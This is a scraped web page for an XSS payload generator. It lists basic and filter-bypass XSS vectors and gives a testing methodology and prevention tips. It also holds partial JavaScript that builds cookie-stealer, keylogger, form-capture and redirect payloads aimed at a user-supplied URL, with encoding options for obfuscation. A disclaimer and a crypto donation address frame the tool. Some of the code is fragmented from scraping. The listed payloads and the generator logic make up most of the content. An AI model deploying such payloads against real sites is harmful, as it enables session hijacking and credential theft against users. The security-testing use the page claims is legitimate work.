🧠 XSS Payload Generator

Generate Cross-Site Scripting (XSS) payloads for security testing. For educational and authorized testing only!

⚠️ Legal Disclaimer

These payloads are for educational purposes and authorized security testing only. Using these payloads against systems without explicit permission is illegal. Always obtain proper authorization before testing for XSS vulnerabilities.

Payload Type:

Target URL (for cookie stealer/redirect):

Custom JavaScript Payload:

Encoding/Obfuscation:

Injection Context:

Generated XSS Payload:

🔄 Payload Variants

📚 Common XSS Payloads

Basic Vectors: • <script>alert('XSS')</script> • <img src=x onerror=alert('XSS')> • <svg onload=alert('XSS')> • <iframe src=javascript:alert('XSS')></iframe> • <body onload=alert('XSS')> • <input onfocus=alert('XSS') autofocus> Filter Bypass: • <ScRiPt>alert('XSS')</ScRiPt> • <script>alert(String.fromCharCode(88,83,83))</script> • <script>eval('al'+'ert("XSS")')</script> • javascript:alert('XSS') • <script src=data:text/javascript,alert('XSS')></script>

🎯 XSS Testing Guide

Testing Methodology: 1. Identify input points (forms, URL parameters, headers) 2. Test for reflection of input in response 3. Analyze the context where input is reflected 4. Craft appropriate payload for the context 5. Test for filter bypasses if blocked 6. Verify payload execution Common Injection Points: • URL parameters (?param=value) • Form inputs (text fields, textareas) • HTTP headers (User-Agent, Referer) • Cookie values • File upload names • Search functionality • Error messages Context-Specific Payloads: • HTML: <script>alert()</script> • Attribute: " onmouseover="alert()" • JavaScript: ';alert();// • CSS: expression(alert()) • URL: javascript:alert() Prevention: • Input validation and sanitization • Output encoding/escaping • Content Security Policy (CSP) • HttpOnly cookies • X-XSS-Protection header

💰 Support Development

This toolkit is 100% free. If it helped you, consider donating in USDT to support future development.

USDT (TRC20):
TACpbL6iRczHYzE4sJCKfHB3Npw8NoQv37

XSS Successful

', '', '">', '\';alert("XSS");//', 'javascript:alert("XSS")', 'data:text/html,', '' ]; function updatePayloadOptions() { const payloadType = document.getElementById('payloadType').value; const targetUrlGroup = document.getElementById('targetUrlGroup'); const customPayloadGroup = document.getElementById('customPayloadGroup'); // Show/hide target URL field if (['cookie', 'redirect', 'keylogger', 'form', 'blind'].includes(payloadType)) { targetUrlGroup.style.display = 'block'; } else { targetUrlGroup.style.display = 'none'; } // Show/hide custom payload field if (payloadType === 'custom') { customPayloadGroup.style.display = 'block'; } else { customPayloadGroup.style.display = 'none'; } } function encodePayload(payload, encoding) { switch (encoding) { case 'url': return encodeURIComponent(payload); case 'html': return payload.replace(/[<>&"']/g, function(match) { const entities = {'<': '<', '>': '>', '&': '&', '"': '"', "'": '''}; return entities[match]; }); case 'unicode': return payload.split('').map(char => '\\u' + char.charCodeAt(0).toString(16).padStart(4, '0')).join(''); case 'hex': return payload.split('').map(char => '\\x' + char.charCodeAt(0).toString(16).padStart(2, '0')).join(''); case 'base64': return btoa(payload); default: return payload; } } function generatePayload() { const payloadType = document.getElementById('payloadType').value; const context = document.getElementById('context').value; const encoding = document.getElementById('encoding').value; const targetUrl = document.getElementById('targetUrl').value; const customPayload = document.getElementById('customPayload').value; let payload; if (payloadType === 'custom') { payload = customPayload || 'alert("XSS")'; } else if (payloadType === 'filter-bypass') { // Return a random filter bypass payload payload = filterBypassPayloads[Math.floor(Math.random() * filterBypassPayloads.length)]; } else { payload = xssPayloads[payloadType][context]; // Replace TARGET_URL placeholder if (targetUrl && payload.includes('TARGET_URL')) { payload = payload.replace(/TARGET_URL/g, targetUrl); } } // Apply encoding if (encoding !== 'none') { payload = encodePayload(payload, encoding); } return payload; } function generateMultiplePayloads() { const payloadType = document.getElementById('payloadType').value; const targetUrl = document.getElementById('targetUrl').value; const variants = []; if (payloadType === 'filter-bypass') { // Generate multiple filter bypass variants variants.push(...filterBypassPayloads); } else { // Generate variants for different contexts const contexts = ['html', 'attribute', 'script', 'event', 'css', 'url']; contexts.forEach(context => { if (xssPayloads[payloadType] && xssPayloads[payloadType][context]) { let payload = xssPayloads[payloadType][context]; if (targetUrl && payload.includes('TARGET_URL')) { payload = payload.replace(/TARGET_URL/g, targetUrl); } variants.push(`${context.toUpperCase()}: ${payload}`); } }); } const variantsDiv = document.getElementById('payloadVariants'); const variantsList = document.getElementById('variantsList'); let html = '

'; variants.forEach((variant, index) => { html += `${variant}\n\n`; }); html += '

'; html += ''; variantsList.innerHTML = html; variantsDiv.style.display = 'block'; showNotification(`Generated ${variants.length} payload variants!`, 'success'); } function copyAllVariants() { const variantsText = document.querySelector('#variantsList .result-text').textContent; copyToClipboard(variantsText); } function loadCommonPayload(type) { const payloads = { basic: '', img: '

', svg: '